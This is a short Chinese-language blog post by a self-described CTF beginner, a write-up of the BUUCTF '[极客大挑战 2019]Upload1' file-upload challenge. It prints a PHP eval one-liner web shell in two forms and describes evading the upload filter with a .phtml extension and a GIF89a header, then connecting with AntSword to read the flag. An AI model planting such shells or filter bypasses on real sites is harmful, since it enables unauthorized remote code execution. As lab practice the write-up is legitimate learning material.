BUUCTF(1)

张开发
2026/4/13 16:45:32 15 分钟阅读

分享文章

BUUCTF(1)
大家好本人是第一次写博客是一个CTF新手我通过记录我的做题思路和学到的东西技术一般欢迎大佬指点也欢迎一起学习交流。1.[极客大挑战 2019]Upload1刚开始让我们上传一个图片这种题一般都是上传后门一句话木马?php eval($_POST[hack]);?这里面hack为登录后门时所需要使用的密码我们写一个hack.php代码就是上面那个然后我们改掉它的后缀名为.png显示这个表示作者发现我们将php文件伪装为png文件了随后我们使用script languagephpeval($_POST[cmd]);/script这是php的另一种写法我们进行上传他说我这根本不是图片我们修改我们的后缀为.phtml后我们在bp中抓包修改文件头使用GIF89a这里显示上传成功我们就可以使用后门软件我这里用的蚁剑连接地址应该为网址/upload/上传的文件名http://86c9b1a6-01ea-4f76-8a94-a92c358e7eff.node5.buuoj.cn:81/upload/hack2.phtml然后搜索flag我们就得到flag了。

更多文章